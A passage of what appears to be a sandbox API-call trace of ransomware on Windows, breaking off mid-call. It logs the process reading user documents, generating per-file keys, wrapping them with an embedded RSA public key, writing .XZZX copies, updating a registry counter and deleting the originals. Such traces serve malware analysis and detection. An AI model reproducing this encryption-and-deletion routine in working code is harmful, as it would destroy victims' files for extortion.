[0038.593] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.594] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0038.594] CryptDestroyKey (hKey=0x3251f8) returned 1 [0038.594] CryptReleaseContext (hProv=0x3e2d4b0, dwFlags=0x0) returned 0 [0038.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3CCCBC286641FC324D4A8B2C932644.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bb3cccbc286641fc324d4a8b2c932644.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0038.595] WriteFile (in: hFile=0x478, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x178a4, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x42ce438*=0x178a4, lpOverlapped=0x0) returned 1 [0038.596] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178a4 [0038.596] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.596] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178a9 [0038.596] WriteFile (in: hFile=0x478, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x32, lpOverlapped=0x0) returned 1 [0038.596] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178db [0038.596] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.596] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178e0 [0038.596] SetErrorMode (uMode=0x1) returned 0x1 [0038.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0038.597] OutputDebugStringW (lpOutputString="end") [0038.597] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0038.597] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0038.597] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2d538) returned 1 [0038.597] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d538, dwCertEncodingType=0x1, pInfo=0x3dd2818*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2848*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2850*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3251f8) returned 1 [0038.597] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.598] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0038.598] CryptEncrypt (in: hKey=0x3251f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0038.598] CryptEncrypt (in: hKey=0x3251f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d5c0*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d5c0*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0038.598] WriteFile (in: hFile=0x478, lpBuffer=0x3e2d5c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d5c0*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0038.598] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0038.598] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.598] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0038.598] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0038.598] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x480) returned 0x0 [0038.598] RegQueryValueExW (in: hKey=0x480, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x1c, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0038.598] RegCloseKey (hKey=0x480) returned 0x0 [0038.598] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x480) returned 0x0 [0038.598] RegSetValueExW (in: hKey=0x480, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x1d, cbData=0x4 | out: lpData=0x42cdfec*=0x1d) returned 0x0 [0038.599] RegCloseKey (hKey=0x480) returned 0x0 [0038.599] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.599] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.599] CloseHandle (hObject=0x478) returned 1 [0038.600] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0038.601] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0038.601] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X2tQqTNWjx7lgtPo5htj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x2tqqtnwjx7lgtpo5htj.pptx")) returned 1 [0038.602] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X2tQqTNWjx7lgtPo5htj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x2tqqtnwjx7lgtpo5htj.pptx")) returned 0 Thread: id = 120 os_tid = 0x8d8 [0038.540] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.540] lstrcpyW (in: lpString1=0x417f460, lpString2="_oHxelCBmJ.docx" | out: lpString1="_oHxelCBmJ.docx") returned="_oHxelCBmJ.docx" [0038.540] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.540] SetErrorMode (uMode=0x1) returned 0x1 [0038.540] lstrcpyW (in: lpString1=0x417f860, lpString2="_oHxelCBmJ.docx" | out: lpString1="_oHxelCBmJ.docx") returned="_oHxelCBmJ.docx" [0038.541] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xfade96e1, Data2=0xd4ff, Data3=0x4cce, Data4=([0]=0x86, [1]=0x66, [2]=0xea, [3]=0x6b, [4]=0xf0, [5]=0x9a, [6]=0xfd, [7]=0x52))) returned 0x0 [0038.541] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_oHxelCBmJ.docx") returned 59 [0038.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0038.541] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned 81 [0038.541] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="XZZX") returned 0x0 [0038.541] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_oHxelCBmJ.docx", dwFileAttributes=0x20) returned 1 [0038.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_oHxelCBmJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ohxelcbmj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0038.541] ReadFile (in: hFile=0x478, lpBuffer=0x42d0048, nNumberOfBytesToRead=0x146e2, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesRead=0x417e418*=0x146e2, lpOverlapped=0x0) returned 1 [0038.542] CloseHandle (hObject=0x478) returned 1 [0038.542] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0038.542] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0038.543] SetErrorMode (uMode=0x1) returned 0x1 [0038.543] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0038.543] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d4b0) returned 1 [0038.545] CryptGenKey (in: hProv=0x3e2d4b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f50) returned 1 [0039.199] CryptExportKey (in: hKey=0x42e4f50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.199] CryptExportKey (in: hKey=0x42e4f50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x417e41c | out: pbData=0x3ec0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.199] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.200] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.200] CryptDestroyKey (hKey=0x42e4f50) returned 1 [0039.200] CryptReleaseContext (hProv=0x3e2d6d0, dwFlags=0x0) returned 0 [0039.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\38aa9e1f3fe71932fade96e143fefd7a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0039.201] WriteFile (in: hFile=0x48c, lpBuffer=0x42d0048*, nNumberOfBytesToWrite=0x146e2, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesWritten=0x417e438*=0x146e2, lpOverlapped=0x0) returned 1 [0039.202] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x146e2 [0039.202] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.202] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x146e7 [0039.202] WriteFile (in: hFile=0x48c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x1e, lpOverlapped=0x0) returned 1 [0039.202] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14705 [0039.202] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.202] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1470a [0039.202] SetErrorMode (uMode=0x1) returned 0x1 [0039.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0039.203] OutputDebugStringW (lpOutputString="end") [0039.203] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.203] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0039.203] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2d758) returned 1 [0039.203] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d758, dwCertEncodingType=0x1, pInfo=0x3dd29b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd29e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd29f0*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e4f50) returned 1 [0039.203] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.204] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0039.204] CryptEncrypt (in: hKey=0x42e4f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0039.204] CryptEncrypt (in: hKey=0x42e4f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d7e0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d7e0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0039.204] WriteFile (in: hFile=0x48c, lpBuffer=0x3e2d7e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d7e0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0039.204] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0039.204] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.204] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0039.256] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0039.256] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x494) returned 0x0 [0039.256] RegQueryValueExW (in: hKey=0x494, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x1f, lpcbData=0x417dfdc*=0x4) returned 0x0 [0039.256] RegCloseKey (hKey=0x494) returned 0x0 [0039.256] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x494) returned 0x0 [0039.256] RegSetValueExW (in: hKey=0x494, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x20, cbData=0x4 | out: lpData=0x417dfec*=0x20) returned 0x0 [0039.256] RegCloseKey (hKey=0x494) returned 0x0 [0039.256] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.256] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.257] CloseHandle (hObject=0x48c) returned 1 [0039.257] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0039.258] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0039.258] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_oHxelCBmJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ohxelcbmj.docx")) returned 1 [0039.258] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_oHxelCBmJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ohxelcbmj.docx")) returned 0 Thread: id = 121 os_tid = 0x8a8 [0038.715] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.715] lstrcpyW (in: lpString1=0x42cf460, lpString2="_P_aT.odt" | out: lpString1="_P_aT.odt") returned="_P_aT.odt" [0038.715] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.715] SetErrorMode (uMode=0x1) returned 0x1 [0038.716] lstrcpyW (in: lpString1=0x42cf860, lpString2="_P_aT.odt" | out: lpString1="_P_aT.odt") returned="_P_aT.odt" [0038.716] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x9e2ca2e3, Data2=0xb193, Data3=0x49f5, Data4=([0]=0xbd, [1]=0xf3, [2]=0xd4, [3]=0x2e, [4]=0x17, [5]=0x93, [6]=0x92, [7]=0x72))) returned 0x0 [0038.716] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_P_aT.odt") returned 53 [0038.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0038.716] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned 81 [0038.716] StrStrW (lpFirst="_P_aT.odt", lpSrch="XZZX") returned 0x0 [0038.716] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_P_aT.odt", dwFileAttributes=0x20) returned 1 [0038.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_P_aT.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_p_at.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0038.716] ReadFile (in: hFile=0x47c, lpBuffer=0x3e3ed28, nNumberOfBytesToRead=0x3de9, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e3ed28*, lpNumberOfBytesRead=0x42ce418*=0x3de9, lpOverlapped=0x0) returned 1 [0038.717] CloseHandle (hObject=0x47c) returned 1 [0038.717] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0038.717] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0038.718] SetErrorMode (uMode=0x1) returned 0x1 [0038.718] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0038.718] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d648) returned 1 [0038.720] CryptGenKey (in: hProv=0x3e2d648, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4ed0) returned 1 [0039.216] CryptExportKey (in: hKey=0x42e4ed0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0039.216] CryptExportKey (in: hKey=0x42e4ed0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: 